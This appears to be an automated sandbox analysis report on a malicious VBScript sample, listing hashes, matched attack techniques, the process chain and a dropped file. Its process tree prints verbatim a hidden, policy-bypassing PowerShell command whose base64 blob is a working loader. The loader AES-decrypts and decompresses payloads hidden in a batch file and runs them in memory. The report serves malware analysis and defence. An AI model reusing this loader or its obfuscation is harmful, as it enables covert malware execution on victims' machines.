Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26/02/2025, 03:43
Static task
static1
Behavioral task
behavioral1
Sample
79d97c2eba527a05d8cda6cec044210589b077f52e421753680d60c43307cf2c.vbs
Resource
win7-20240903-en
General
-
Target
79d97c2eba527a05d8cda6cec044210589b077f52e421753680d60c43307cf2c.vbs
-
Size
78KB
-
MD5
7d6d78a570ec3a06ed4951b100bae952
-
SHA1
2e10134fc256a1bfe57862f69c83fc7f93949897
-
SHA256
79d97c2eba527a05d8cda6cec044210589b077f52e421753680d60c43307cf2c
-
SHA512
4508aff8dac72984d66f3eb5ef4eac52f120428a9fa9c0e278fa6f0284aa3a1b88dc88842732855e508ecbfa5ef437a21f01a65b992031f62c892123414377b9
-
SSDEEP
1536:+GZt0fSE6gUXAXbAiCsj9O4THNXQ4evC65EmJx7gjGSq2FjqGJDvHA/goVP8nJ:+xbv44DNXQxvC66oxiq9+Dvyg2P8nJ
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2940 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2940 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2940 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2424 wrote to memory of 2444 2424 WScript.exe 28 PID 2424 wrote to memory of 2444 2424 WScript.exe 28 PID 2424 wrote to memory of 2444 2424 WScript.exe 28 PID 2444 wrote to memory of 1312 2444 cmd.exe 30 PID 2444 wrote to memory of 1312 2444 cmd.exe 30 PID 2444 wrote to memory of 1312 2444 cmd.exe 30 PID 1312 wrote to memory of 2940 1312 cmd.exe 32 PID 1312 wrote to memory of 2940 1312 cmd.exe 32 PID 1312 wrote to memory of 2940 1312 cmd.exe 32 PID 1312 wrote to memory of 2940 1312 cmd.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\79d97c2eba527a05d8cda6cec044210589b077f52e421753680d60c43307cf2c.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ELu1xjIqz.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ELu1xjIqz.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskZ3ZpcnQgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJGd2aXJ0KSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRndmlydCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRndmlydCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkZ3ZpcnQiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gYWtrbHgoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0JYQjlnQlA2NnVsYVdRVGk5Qm14ZG5rcFVTem9LWlZlQ1dqNEVoZFN6Wjg9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3EycEpvR3BFcWZjcVpvdGNCdFl4V2c9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24ga29rdmkoJHBhcmFtX3Zhcil7CSR6am5peD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkdHduanQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkdG90c2c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkempuaXgsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHRvdHNnLkNvcHlUbygkdHduanQpOwkkdG90c2cuRGlzcG9zZSgpOwkkempuaXguRGlzcG9zZSgpOwkkdHduanQuRGlzcG9zZSgpOwkkdHduanQuVG9BcnJheSgpO31mdW5jdGlvbiBtcWxweigkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHFndG56PVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGlraWVrPSRxZ3Ruei5FbnRyeVBvaW50OwkkaWtpZWsuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJGd2aXJ0OyRsb3J3cj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJGd2aXJ0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkbnFtIGluICRsb3J3cikgewlpZiAoJG5xbS5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHd4enNpPSRucW0uU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JG91dmpoPVtzdHJpbmdbXV0kd3h6c2kuU3BsaXQoJ1wnKTskdHZjZGU9a29rdmkgKGFra2x4IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJG91dmpoWzBdKSkpOyRzYmJ1Yz1rb2t2aSAoYWtrbHggKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkb3V2amhbMV0pKSk7bXFscHogJHR2Y2RlICRudWxsO21xbHB6ICRzYmJ1YyAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD57deb78f3e137a6b335adb9023c1f78c3
SHA10cf3f6c7f64125526bcaa23b952f5c35b8029b79
SHA25648e34f1082c5ccef3ce344cccb3bb1aecb2f3d6de722b72465c6d07126e3e65f
SHA51264b701544b51d6a82e828e0144f67ced26e26ded528b1ff66c07f47d27b990a5558d56883d1a1709b9cb140c45987974ab7f8cd84dee1c1b9743f56173a46400